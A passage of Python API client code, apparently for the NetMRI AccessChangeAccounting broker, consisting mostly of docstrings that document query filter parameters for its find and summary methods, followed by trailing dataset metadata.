:param op_ACAEndTime: The operator to apply to the field ACAEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ACAEndTime: The ending effective time of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ACAEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ACAEndTime: If op_ACAEndTime is specified, the field named in this input will be compared to the value in ACAEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ACAEndTime must be specified if op_ACAEndTime is specified.
:type val_f_ACAEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ACAEndTime: If op_ACAEndTime is specified, this value will be compared to the value in ACAEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ACAEndTime must be specified if op_ACAEndTime is specified.
:type val_c_ACAEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ACAFirstSeenTime: The operator to apply to the field ACAFirstSeenTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ACAFirstSeenTime: The timestamp of when NetMRI recorded its first access statistic for this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ACAFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ACAFirstSeenTime: If op_ACAFirstSeenTime is specified, the field named in this input will be compared to the value in ACAFirstSeenTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ACAFirstSeenTime must be specified if op_ACAFirstSeenTime is specified.
:type val_f_ACAFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ACAFirstSeenTime: If op_ACAFirstSeenTime is specified, this value will be compared to the value in ACAFirstSeenTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ACAFirstSeenTime must be specified if op_ACAFirstSeenTime is specified.
:type val_c_ACAFirstSeenTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ACAStartTime: The operator to apply to the field ACAStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ACAStartTime: The starting effective time of this record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ACAStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ACAStartTime: If op_ACAStartTime is specified, the field named in this input will be compared to the value in ACAStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ACAStartTime must be specified if op_ACAStartTime is specified.
:type val_f_ACAStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ACAStartTime: If op_ACAStartTime is specified, this value will be compared to the value in ACAStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ACAStartTime must be specified if op_ACAStartTime is specified.
:type val_c_ACAStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ACATimestamp: The operator to apply to the field ACATimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ACATimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ACATimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ACATimestamp: If op_ACATimestamp is specified, the field named in this input will be compared to the value in ACATimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ACATimestamp must be specified if op_ACATimestamp is specified.
:type val_f_ACATimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ACATimestamp: If op_ACATimestamp is specified, this value will be compared to the value in ACATimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ACATimestamp must be specified if op_ACATimestamp is specified.
:type val_c_ACATimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AccessChangeAccountingID: The operator to apply to the field AccessChangeAccountingID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AccessChangeAccountingID: The internal NetMRI identifier for this access accounting element. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AccessChangeAccountingID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AccessChangeAccountingID: If op_AccessChangeAccountingID is specified, the field named in this input will be compared to the value in AccessChangeAccountingID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AccessChangeAccountingID must be specified if op_AccessChangeAccountingID is specified.
:type val_f_AccessChangeAccountingID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AccessChangeAccountingID: If op_AccessChangeAccountingID is specified, this value will be compared to the value in AccessChangeAccountingID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AccessChangeAccountingID must be specified if op_AccessChangeAccountingID is specified.
:type val_c_AccessChangeAccountingID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device for which we count the access statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterAdded: The operator to apply to the field FilterAdded. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterAdded: The number of rules added by provisioning with NetMRI (including rollback operations). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterAdded: If op_FilterAdded is specified, the field named in this input will be compared to the value in FilterAdded using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterAdded must be specified if op_FilterAdded is specified.
:type val_f_FilterAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterAdded: If op_FilterAdded is specified, this value will be compared to the value in FilterAdded using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterAdded must be specified if op_FilterAdded is specified.
:type val_c_FilterAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterAll: The operator to apply to the field FilterAll. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterAll: The number of all rules defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterAll: If op_FilterAll is specified, the field named in this input will be compared to the value in FilterAll using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterAll must be specified if op_FilterAll is specified.
:type val_f_FilterAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterAll: If op_FilterAll is specified, this value will be compared to the value in FilterAll using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterAll must be specified if op_FilterAll is specified.
:type val_c_FilterAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterRemoved: The operator to apply to the field FilterRemoved. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterRemoved: The number of rules removed by provisioning with NetMRI (including remediation). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterRemoved: If op_FilterRemoved is specified, the field named in this input will be compared to the value in FilterRemoved using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterRemoved must be specified if op_FilterRemoved is specified.
:type val_f_FilterRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterRemoved: If op_FilterRemoved is specified, this value will be compared to the value in FilterRemoved using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterRemoved must be specified if op_FilterRemoved is specified.
:type val_c_FilterRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterSetAdded: The operator to apply to the field FilterSetAdded. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterSetAdded: The number of rule lists added by provisioning with NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterSetAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterSetAdded: If op_FilterSetAdded is specified, the field named in this input will be compared to the value in FilterSetAdded using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterSetAdded must be specified if op_FilterSetAdded is specified.
:type val_f_FilterSetAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterSetAdded: If op_FilterSetAdded is specified, this value will be compared to the value in FilterSetAdded using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterSetAdded must be specified if op_FilterSetAdded is specified.
:type val_c_FilterSetAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterSetAll: The operator to apply to the field FilterSetAll. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterSetAll: The number of all rule lists defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterSetAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterSetAll: If op_FilterSetAll is specified, the field named in this input will be compared to the value in FilterSetAll using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterSetAll must be specified if op_FilterSetAll is specified.
:type val_f_FilterSetAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterSetAll: If op_FilterSetAll is specified, this value will be compared to the value in FilterSetAll using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterSetAll must be specified if op_FilterSetAll is specified.
:type val_c_FilterSetAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterSetRemoved: The operator to apply to the field FilterSetRemoved. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterSetRemoved: The number of rule lists removed by provisioning with NetMRI (including remediation). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterSetRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterSetRemoved: If op_FilterSetRemoved is specified, the field named in this input will be compared to the value in FilterSetRemoved using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterSetRemoved must be specified if op_FilterSetRemoved is specified.
:type val_f_FilterSetRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterSetRemoved: If op_FilterSetRemoved is specified, this value will be compared to the value in FilterSetRemoved using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterSetRemoved must be specified if op_FilterSetRemoved is specified.
:type val_c_FilterSetRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterSetUnused: The operator to apply to the field FilterSetUnused. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterSetUnused: The number of unused rule lists defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterSetUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterSetUnused: If op_FilterSetUnused is specified, the field named in this input will be compared to the value in FilterSetUnused using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterSetUnused must be specified if op_FilterSetUnused is specified.
:type val_f_FilterSetUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterSetUnused: If op_FilterSetUnused is specified, this value will be compared to the value in FilterSetUnused using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterSetUnused must be specified if op_FilterSetUnused is specified.
:type val_c_FilterSetUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterUnused: The operator to apply to the field FilterUnused. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterUnused: The number of unused rules defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterUnused: If op_FilterUnused is specified, the field named in this input will be compared to the value in FilterUnused using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterUnused must be specified if op_FilterUnused is specified.
:type val_f_FilterUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterUnused: If op_FilterUnused is specified, this value will be compared to the value in FilterUnused using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterUnused must be specified if op_FilterUnused is specified.
:type val_c_FilterUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IPObjectAdded: The operator to apply to the field IPObjectAdded. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IPObjectAdded: The number of network objects added by provisioning with NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IPObjectAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IPObjectAdded: If op_IPObjectAdded is specified, the field named in this input will be compared to the value in IPObjectAdded using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IPObjectAdded must be specified if op_IPObjectAdded is specified.
:type val_f_IPObjectAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IPObjectAdded: If op_IPObjectAdded is specified, this value will be compared to the value in IPObjectAdded using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IPObjectAdded must be specified if op_IPObjectAdded is specified.
:type val_c_IPObjectAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IPObjectAll: The operator to apply to the field IPObjectAll. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IPObjectAll: The number of network objects defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IPObjectAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IPObjectAll: If op_IPObjectAll is specified, the field named in this input will be compared to the value in IPObjectAll using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IPObjectAll must be specified if op_IPObjectAll is specified.
:type val_f_IPObjectAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IPObjectAll: If op_IPObjectAll is specified, this value will be compared to the value in IPObjectAll using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IPObjectAll must be specified if op_IPObjectAll is specified.
:type val_c_IPObjectAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IPObjectRemoved: The operator to apply to the field IPObjectRemoved. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IPObjectRemoved: The number of network objects removed by provisioning with NetMRI (including remediation). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IPObjectRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IPObjectRemoved: If op_IPObjectRemoved is specified, the field named in this input will be compared to the value in IPObjectRemoved using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IPObjectRemoved must be specified if op_IPObjectRemoved is specified.
:type val_f_IPObjectRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IPObjectRemoved: If op_IPObjectRemoved is specified, this value will be compared to the value in IPObjectRemoved using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IPObjectRemoved must be specified if op_IPObjectRemoved is specified.
:type val_c_IPObjectRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IPObjectUnused: The operator to apply to the field IPObjectUnused. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IPObjectUnused: The number of network objects defined in the device's configuration that are not used in the configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IPObjectUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IPObjectUnused: If op_IPObjectUnused is specified, the field named in this input will be compared to the value in IPObjectUnused using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IPObjectUnused must be specified if op_IPObjectUnused is specified.
:type val_f_IPObjectUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IPObjectUnused: If op_IPObjectUnused is specified, this value will be compared to the value in IPObjectUnused using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IPObjectUnused must be specified if op_IPObjectUnused is specified.
:type val_c_IPObjectUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ServiceAdded: The operator to apply to the field ServiceAdded. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ServiceAdded: The number of service objects added by provisioning with NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ServiceAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ServiceAdded: If op_ServiceAdded is specified, the field named in this input will be compared to the value in ServiceAdded using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ServiceAdded must be specified if op_ServiceAdded is specified.
:type val_f_ServiceAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ServiceAdded: If op_ServiceAdded is specified, this value will be compared to the value in ServiceAdded using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ServiceAdded must be specified if op_ServiceAdded is specified.
:type val_c_ServiceAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ServiceAll: The operator to apply to the field ServiceAll. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ServiceAll: The number of service objects defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ServiceAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ServiceAll: If op_ServiceAll is specified, the field named in this input will be compared to the value in ServiceAll using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ServiceAll must be specified if op_ServiceAll is specified.
:type val_f_ServiceAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ServiceAll: If op_ServiceAll is specified, this value will be compared to the value in ServiceAll using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ServiceAll must be specified if op_ServiceAll is specified.
:type val_c_ServiceAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ServiceRemoved: The operator to apply to the field ServiceRemoved. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ServiceRemoved: The number of service objects removed by provisioning with NetMRI (including remediation). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ServiceRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ServiceRemoved: If op_ServiceRemoved is specified, the field named in this input will be compared to the value in ServiceRemoved using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ServiceRemoved must be specified if op_ServiceRemoved is specified.
:type val_f_ServiceRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ServiceRemoved: If op_ServiceRemoved is specified, this value will be compared to the value in ServiceRemoved using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ServiceRemoved must be specified if op_ServiceRemoved is specified.
:type val_c_ServiceRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ServiceUnused: The operator to apply to the field ServiceUnused. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ServiceUnused: The number of service objects defined in the device's configuration that are not used in the configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ServiceUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ServiceUnused: If op_ServiceUnused is specified, the field named in this input will be compared to the value in ServiceUnused using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ServiceUnused must be specified if op_ServiceUnused is specified.
:type val_f_ServiceUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ServiceUnused: If op_ServiceUnused is specified, this value will be compared to the value in ServiceUnused using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ServiceUnused must be specified if op_ServiceUnused is specified.
:type val_c_ServiceUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the access change accountings as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` AccessChangeAccountingID
:param sort: The data field(s) to use for sorting the output. Default is AccessChangeAccountingID. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AccessChangeAccounting. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return access_change_accountings: An array of the AccessChangeAccounting objects that match the specified input criteria.
:rtype access_change_accountings: Array of AccessChangeAccounting
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def summary(self, **kwargs):
"""Returns a summary of accounting.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param starttime: time of starting period for summary computations
:type starttime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param endtime: time of ending period for summary computations
:type endtime: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param device_group_set_ids: IDs of the group we want the summary for
:type device_group_set_ids: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param device_ids: IDs of the group we want the summary for
:type device_ids: Array of Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return values: a hash containing summary-names and their numeric values.
:rtype values: Hash
"""
return self.api_request(self._get_method_fullname("summary"), kwargs)
| 58.821035
| 782
| 0.632646
| 8,458
| 69,350
| 5.128163
| 0.037716
| 0.063633
| 0.041361
| 0.054088
| 0.942523
| 0.939941
| 0.906349
| 0.890672
| 0.885
| 0.884631
| 0
| 0.002659
| 0.28969
| 69,350
| 1,179
| 783
| 58.821035
| 0.877852
| 0.840865
| 0
| 0
| 0
| 0
| 0.057627
| 0.028249
| 0
| 0
| 0
| 0
| 0
| 1
| 0.384615
| false
| 0
| 0.076923
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
91380870376fc8358111f78bf34b05e774be162d
| 11,105
|
py
|
Python
|
benchmarks/benchmark_sn_blocker.py
|
dmvieira/py_entitymatching
|
25b48cf3a60f0cd05f25ffd38b735a461686eff7
|
[
"BSD-3-Clause"
] | 165
|
2016-08-28T14:30:01.000Z
|
2022-03-29T17:24:03.000Z
|
benchmarks/benchmark_sn_blocker.py
|
mvahit/py_entitymatching
|
6724081d7d95c547e5a51625b4a8207c6c1737f8
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 70
|
2016-11-22T00:35:22.000Z
|
2022-03-11T22:26:26.000Z
|
benchmarks/benchmark_sn_blocker.py
|
